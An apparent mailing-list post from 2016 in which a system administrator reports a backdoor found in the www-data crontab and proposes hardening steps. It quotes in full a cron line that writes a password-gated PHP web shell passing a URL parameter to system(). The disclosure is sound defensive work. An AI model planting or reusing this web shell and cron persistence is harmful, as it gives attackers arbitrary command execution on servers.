[Systems] Found a backdoor

Bernie Innocenti bernie at codewiz.org
Thu Feb 25 04:47:28 EST 2016


While I was looking for cronjobs in /var/spool/cron/crontabs/, I found
that www-data was executing commands like these:

*/27 * * * * echo '<?php if (substr(md5($_GET["localdate"]),0,6) ==
"6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]);
@system($time); exit; } ?>' > /srv/www-somosazucar/blog/.cache.php

Did you spot the system()? This executes arbitrary commands specified
via the "localtime" url parameter. Uh-oh.

There were about a dozen lines like the above, installing .cache.php in
various virtualhosts. I kept a copy of the file in
/root/www-data.backdoor. The file was last written on Jun 23  2015,
which may correlate with the switch to the new website.

I cleared the mess and searched the logs for requests containing
"localtime", but couldn't find any. I wonder if they could filter the
logs, since they were previously writable by www-data.

Please watch out. We should ensure directories accessible over http are
not writable by user www-data, especially those in which PHP and CGIs
are enabled.

Running several large sites under the same uid has always been a bad
security practice, and looking forward we should keep migrating them to
properly isolated containers.

Finally, Wordpress is particularly dangerous and we should update and
harden all instances. Can someone please take care of this? I'll do
Mediawiki, which I know pretty well.

-- 
 _ // Bernie Innocenti
 \X/  http://codewiz.org

